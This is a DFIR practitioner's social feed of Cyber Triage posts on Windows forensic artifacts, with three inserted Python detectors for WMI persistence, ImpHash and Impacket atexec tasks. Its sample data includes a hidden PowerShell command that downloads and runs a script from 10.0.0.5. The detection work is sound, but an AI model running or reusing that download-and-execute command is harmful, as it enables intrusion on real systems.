@markmckinnon@infosec.exchange.

Joined April 2008
markmckinnon retweeted
Windows registry can contain evidence of: → Execution → Persistence → Data accessed Our overview of the registry and tools for analyzing it: cybertriage.com/blog/2025-gu…
markmckinnon retweeted
3 reasons attackers use WMI Event Consumers: → Stealth and evasion → Fileless persistence → Event-driven execution Learn how to investigate evil WMI event consumers: cybertriage.com/blog/how-to-…
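The three traits the post lists (stealth, fileless persistence, event-driven execution) all live in one place: a permanent WMI subscription is a filter (the trigger), a consumer (the payload) and a binding that ties them together. The following is an added example, not code from the Cyber Triage post or its tooling: it reconstructs those subscriptions from Sysmon event IDs 19, 20 and 21 and flags the bindings whose consumer class executes code. Field names follow Sysmon's WmiEvent schema as the author knows it; the records are constructed sample data in the shape of parsed EventData, not real logs.

```python
"""Reconstruct WMI permanent event subscriptions from Sysmon events 19/20/21.

Added example, not code from the Cyber Triage post or its tooling. It joins
the filter (19), consumer (20) and binding (21) records by name and flags
bindings whose consumer class executes code. Field names follow Sysmon's
WmiEvent schema as the author knows it; the records below are constructed
sample data in the shape of parsed EventData, not real logs.
"""
import re
from typing import List

# Consumer classes that run attacker-supplied input when the filter fires.
CODE_EXECUTING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# WMI object path as it appears in event 21, e.g. __EventFilter.Name="x"
PATH_RE = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>[^"]*)"$')


def split_path(path: str):
    """'CommandLineEventConsumer.Name="x"' -> ('CommandLineEventConsumer', 'x')"""
    m = PATH_RE.match(path)
    if not m:
        raise ValueError(f"unrecognised WMI object path: {path!r}")
    return m["cls"], m["name"]


def find_wmi_persistence(events: List[dict]) -> List[dict]:
    """Return one finding per binding that wires a filter to a code-executing consumer."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19 and e["Operation"] == "Created"}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20 and e["Operation"] == "Created"}
    findings = []
    for e in events:
        if e["EventID"] != 21 or e["Operation"] != "Created":
            continue
        consumer_cls, consumer_name = split_path(e["Consumer"])
        _, filter_name = split_path(e["Filter"])
        if consumer_cls not in CODE_EXECUTING_CONSUMERS:
            continue  # e.g. NTEventLogEventConsumer behind the built-in SCM subscription
        findings.append({
            "consumer_class": consumer_cls,
            "consumer": consumer_name,
            "filter": filter_name,
            "created_by": e["User"],
            "trigger": filters.get(filter_name, {}).get("Query", "<filter event not seen>"),
            "payload": consumers.get(consumer_name, {}).get("Destination", "<consumer event not seen>"),
        })
    return findings


# Constructed sample records (not real telemetry). The first binding is the
# benign SCM subscription every Windows host has; the rest are a classic
# uptime-triggered PowerShell launcher.
SAMPLE_SYSMON = [
    {"EventID": 21, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    {"EventID": 19, "Operation": "Created", "User": "CORP\\jdoe",
     "EventNamespace": "root\\subscription", "Name": "ProcessWatch",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"EventID": 20, "Operation": "Created", "User": "CORP\\jdoe", "Name": "ProcessWatch",
     "Destination": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.0.0.5/a.ps1')\""},
    {"EventID": 21, "Operation": "Created", "User": "CORP\\jdoe",
     "Consumer": 'CommandLineEventConsumer.Name="ProcessWatch"',
     "Filter": '__EventFilter.Name="ProcessWatch"'},
]

if __name__ == "__main__":
    for finding in find_wmi_persistence(SAMPLE_SYSMON):
        print(finding)
```

Joining on the binding rather than on the consumer alone matters: a consumer that is never bound to a filter does nothing, and a filter bound to the stock NTEventLogEventConsumer is normal. The `<filter event not seen>` defaults are deliberate, since Sysmon may have been installed after the subscription was created and only the binding may be visible.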
markmckinnon retweeted
Are you ready? @carrier4n6 teaches endpoint triage tomorrow! Triage investigations tell you: → What happened on your system → What to prioritize during the investigation Don’t be a square. (Or, do be?) Either way, here’s how to register: attendee.gotowebinar.com/reg…
markmckinnon retweeted
4 user activity insights from jump lists: → Files a user has accessed → Applications used to access files → Frequency files have been accessed → Evidence of files no longer on the system Learn how our DFIR experts do jump list forensics: cybertriage.com/blog/jump-li…
markmckinnon retweeted
The DFIR concept you should be using. (but aren’t) ⤵ “Information Artifacts” Learn how to use this concept to make your investigations more efficient from @carrier4n6 cybertriage.com/blog/informa…
markmckinnon retweeted
EDRs won’t collect all DFIR Artifacts. 5 ways to deploy DFIR tools to help your investigation ⤵ Try all these methods with Cyber Triage Team SentinelOne Singularity, Windows Defender, and CrowdStrike Falcon. P.S. Which method do you use?
markmckinnon retweeted
3 examples of sneaky remote access: → Malicious RATs → Commercial Remote Access → Remote Windows Access Attackers can use these to place incriminating evidence on an innocent user’s system. A suspect can claim the “Trojan Defense” How to back your claim: cybertriage.com/blog/dfir-ar…
markmckinnon retweeted
Why “adaptive” collection kicks @$$ DFIR collection is about 2 things: #1 Getting all the evidence. #2 Getting it quickly. “Static” collectors focus only on #2. “Adaptive” collectors do both. (That’s why Cyber Triage comes with one) Learn more → cybertriage.com/blog/adaptiv…
markmckinnon retweeted
Think your Linux system is compromised? Investigate it with UAC ⤵ UAC is an open-source static collection tool designed to collect key forensic artifacts from “nix” systems. Review the suspicious items in the output with Cyber Triage! cybertriage.com/blog/collect…
markmckinnon retweeted
Attackers can evade you with one *tiny* change. It can cause you to not detect malware and miss evidence in your investigation. Learn how Cyber Triage uses ImpHash to detect fuzzy hashes in malware: cybertriage.com/blog/intro-t…
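The "one tiny change" in the post is the whole reason import hashing exists: flipping a byte, changing a string or re-packing a sample gives it a fresh SHA-256 while its import table, and therefore its ImpHash, stays the same. The block below is an added example, not code from the Cyber Triage post or its tooling. It computes ImpHash over an explicit import table using the normalisation rules of the pefile definition as the author understands them (library lower-cased with a trailing .dll/.ocx/.sys removed, symbol lower-cased, ordinal imports written as ordN, entries joined as lib.func in table order, then MD5), and shows a one-byte edit that defeats the exact hash but not the import hash. pefile additionally resolves well-known ws2_32/oleaut32 ordinals to names; that lookup table is omitted here. The import tables and file bytes are constructed sample data.

```python
"""Import hash (ImpHash) over a PE import table, and why a one-byte edit
does not change it.

Added example, not code from the Cyber Triage post or its tooling. The
normalisation follows the pefile definition as the author understands it:
library name lower-cased with a trailing .dll/.ocx/.sys removed, symbol
lower-cased, an import by ordinal written as ordN (pefile also resolves
well-known ws2_32/oleaut32 ordinals to names; that table is omitted here),
entries joined as lib.func with commas in import-table order, then MD5.
Import tables and file bytes below are constructed sample data.
"""
import hashlib
from typing import Iterable, List, Optional, Tuple

Import = Tuple[str, Optional[str], Optional[int]]   # (library, symbol name, ordinal)
_STRIPPED = ("dll", "ocx", "sys")


def normalise_library(libname: str) -> str:
    """KERNEL32.DLL -> kernel32, while ntoskrnl.exe keeps its extension."""
    name = libname.lower()
    base, dot, ext = name.rpartition(".")
    return base if dot and ext in _STRIPPED else name


def imphash(imports: Iterable[Import]) -> str:
    """MD5 over the normalised, comma-joined 'lib.func' list (order matters)."""
    parts = []
    for lib, name, ordinal in imports:
        if name is None:
            if ordinal is None:
                raise ValueError(f"import from {lib!r} has neither a name nor an ordinal")
            func = f"ord{ordinal}"
        else:
            func = name.lower()
        parts.append(f"{normalise_library(lib)}.{func}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def file_hashes(blob: bytes, imports: Iterable[Import]) -> dict:
    """Pair the exact-match hash with the import hash for one sample."""
    return {"sha256": hashlib.sha256(blob).hexdigest(), "imphash": imphash(imports)}


def evaded_exact_match(a: bytes, b: bytes, imports: Iterable[Import]) -> bool:
    """True when two samples share an import hash but not a SHA-256."""
    imports = list(imports)
    ha, hb = file_hashes(a, imports), file_hashes(b, imports)
    return ha["sha256"] != hb["sha256"] and ha["imphash"] == hb["imphash"]


# Constructed import table of a hypothetical dropper (sample data).
DROPPER_IMPORTS: List[Import] = [
    ("KERNEL32.dll", "CreateFileW", None),
    ("KERNEL32.dll", "WriteFile", None),
    ("ADVAPI32.dll", "RegSetValueExW", None),
    ("COMCTL32.dll", None, 17),     # imported by ordinal only
]
# The same table as another toolchain might emit it: casing differs,
# but neither the set of symbols nor their order does.
DROPPER_IMPORTS_REBUILT: List[Import] = [
    ("kernel32.DLL", "CreateFileW", None),
    ("kernel32.DLL", "WriteFile", None),
    ("advapi32.DLL", "RegSetValueExW", None),
    ("comctl32.DLL", None, 17),
]
# Constructed stand-in for file contents: the second copy differs in exactly
# one byte (think a changed string or padding), enough to defeat an exact hash.
SAMPLE_V1 = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"payload v1"
SAMPLE_V2 = SAMPLE_V1[:-1] + b"2"

if __name__ == "__main__":
    for label, blob in (("v1", SAMPLE_V1), ("v2", SAMPLE_V2)):
        print(label, file_hashes(blob, DROPPER_IMPORTS))
    print("exact match evaded, imphash survives:",
          evaded_exact_match(SAMPLE_V1, SAMPLE_V2, DROPPER_IMPORTS))
```

The flip side is worth keeping in mind when you pivot on ImpHash: because order is part of the hash, adding a single import or relinking with a different import order changes it, so a miss is not proof of a different code base.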
markmckinnon retweeted
4 EDR blindspots for DFIR: • Attackers can avoid EDRs • Retention policies limit data • Detection focus also limits data • Bias against false positives misses investigative clues Augment your Windows Defender with CT to avoid these blindspots: cybertriage.com/blog/how-to-….
markmckinnon retweeted
Cyber Triage 3.12 is out now! This release introduces new key features with the focus of making your response even faster! Join us for a webinar October 9th 1PM EDT to see these features in action Read more here: cybertriage.com/blog/release… Webinar SignUp: register.gotowebinar.com/reg…
markmckinnon retweeted
DFIR Breakdown: Impacket Remote Execution Activity – atexec This blog post focuses on the script atexec.py - which can be abused by threat actors - and how to detect its remote execution activity from various DFIR artifacts. cybertriage.com/blog/dfir-br…

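One of the artifacts atexec.py leaves behind is the Security log pair 4698 (scheduled task created) and 4699 (scheduled task deleted), and the task XML inside the 4698 event is distinctive. The block below is an added example, not code from the Cyber Triage post or its tooling. The signature encodes the default atexec.py task template as the author knows it: a task named with eight random letters, running as LocalSystem, whose only action is `cmd.exe /C <command> > %windir%\Temp\<same eight letters>.tmp 2>&1`, deleted seconds later once the output file has been read back over ADMIN$. The events are constructed sample data in the shape of parsed EVTX EventData (the XML declaration is omitted for brevity), not real logs.

```python
"""Flag Impacket atexec-style task registration in Security 4698/4699 events.

Added example, not code from the Cyber Triage post or its tooling. The
signature encodes the default atexec.py task template as the author knows
it: a task named with 8 random letters, run as LocalSystem, whose action is
cmd.exe /C <command> > %windir%\\Temp\\<same 8 letters>.tmp 2>&1, deleted
seconds later once the output is read back over ADMIN$. The events below are
constructed sample data in the shape of parsed EVTX EventData, not real logs.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime
from typing import List, Optional, Tuple

ARGS_RE = re.compile(r"^/C (?P<cmd>.+) > %windir%\\Temp\\(?P<tmp>[A-Za-z]{8})\.tmp 2>&1$")
NAME_RE = re.compile(r"^\\[A-Za-z]{8}$")
LOCAL_SYSTEM = "S-1-5-18"


def _local(tag: str) -> str:
    """Strip the task-scheduler XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def parse_task(xml_text: str) -> dict:
    """Pull the fields the signature needs out of a 4698 TaskContent blob."""
    fields = {"Command": None, "Arguments": None, "UserId": None, "RunLevel": None}
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name in fields:
            fields[name] = (el.text or "").strip()
    return fields


def atexec_indicators(event: dict) -> Tuple[List[str], Optional[str]]:
    """Return (traits this 4698 event shows, the command run) for the task."""
    task = parse_task(event["TaskContent"])
    hits: List[str] = []
    m = ARGS_RE.match(task["Arguments"] or "")
    if not (task["Command"] and task["Command"].lower().endswith("cmd.exe")):
        m = None
    if m:
        hits.append(f"cmd.exe output redirected to %windir%\\Temp\\{m['tmp']}.tmp")
        if event["TaskName"] == "\\" + m["tmp"]:
            hits.append("task name equals the temp file name")
    if NAME_RE.match(event["TaskName"]):
        hits.append("task name is 8 random letters")
    if task["UserId"] == LOCAL_SYSTEM:
        hits.append("runs as LocalSystem")
    return hits, (m["cmd"] if m else None)


def find_atexec(events: List[dict]) -> List[dict]:
    """Correlate 4698 task content with the 4699 deletion that atexec issues."""
    deleted = {e["TaskName"]: e["TimeCreated"] for e in events if e["EventID"] == 4699}
    findings = []
    for e in events:
        if e["EventID"] != 4698:
            continue
        hits, cmd = atexec_indicators(e)
        if cmd is None:   # the output redirect is the load-bearing indicator
            continue
        f = {"task": e["TaskName"], "command": cmd, "by": e["SubjectUserName"], "indicators": hits}
        if e["TaskName"] in deleted:
            delta = datetime.fromisoformat(deleted[e["TaskName"]]) - datetime.fromisoformat(e["TimeCreated"])
            f["deleted_after_s"] = delta.total_seconds()
        findings.append(f)
    return findings


# Constructed 4698 TaskContent in the shape of the atexec template (sample data).
ATEXEC_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
  <Enabled>true</Enabled><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="LocalSystem"><Exec><Command>cmd.exe</Command>
  <Arguments>/C whoami &gt; %windir%\\Temp\\SxkQaOrb.tmp 2&gt;&amp;1</Arguments></Exec></Actions>
</Task>"""
# Constructed benign task for contrast: also LocalSystem, but no cmd.exe redirect.
BENIGN_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="LocalSystem"><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>"""
SAMPLE_EVENTS = [
    {"EventID": 4698, "TimeCreated": "2024-05-02T13:41:07+00:00", "SubjectUserName": "Administrator",
     "TaskName": "\\SxkQaOrb", "TaskContent": ATEXEC_TASK_XML},
    {"EventID": 4699, "TimeCreated": "2024-05-02T13:41:10+00:00", "SubjectUserName": "Administrator",
     "TaskName": "\\SxkQaOrb"},
    {"EventID": 4698, "TimeCreated": "2024-05-02T13:45:00+00:00", "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "TaskContent": BENIGN_TASK_XML},
]

if __name__ == "__main__":
    for finding in find_atexec(SAMPLE_EVENTS):
        print(finding)
```

Two practical notes: 4698/4699 are only written when "Audit Other Object Access Events" is enabled, so on a host without that policy the fallback is the Microsoft-Windows-TaskScheduler/Operational log and the task file left under `C:\Windows\System32\Tasks` until deletion; and because the operator controls the command, only the redirect shape and the random names are stable, not the command itself.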
markmckinnon retweeted
Have you ever needed to collect DFIR artifacts using a local non-DFIR person who didn’t want to use the command line? Check out this video included in our freely available training course materials now up on our YouTube channel! youtube.com/watch?v=fOT_Sahe…
Glad I chose @Arbys drive thru tonight. Would have been nice to get the chicken portion of my chicken bacon and Swiss sandwich. Highlight of the meal were the fries dipped in Arby’s and horsey sauce as they were the only thing correct in the order.
markmckinnon retweeted
New "DFIR Next Steps" post on what to do when an alert relating to the use of curl.exe is raised. This post walks through a scenario suspecting that curl was used to download a rootkit or malware to the host and the three steps to take afterwards. cybertriage.com/blog/dfir-ne…
markmckinnon retweeted
DFIR Breakdown: Using Certutil To Download Attack Tools Windows certutil is a Windows utility that is used by threat actors during an attack to achieve some malicious goal by installing their own certificates on a system. Learn more and be prepared: hubs.li/Q02HYsDV0
markmckinnon retweeted
#LearnDFIR next week with a Fuzzy Malware Hashing Webinar. Tues at 1PM Eastern. We’ll look at: * Several fuzzy matching algorithms, such as ImpHash, ssdeep, and TLSH. * Pros and cons of them * Which can be used in DFIR attendee.gotowebinar.com/reg…

markmckinnon retweeted
Webinar at 1 today talking about BitLocker and other expanded disk image features in Cyber Triage. Hope to see you there.
Webinar at 1PM EDT Today! We will cover key new features in the latest Cyber Triage release so that you can most effectively use what's been added. Register here: hubs.li/Q02F-xJK0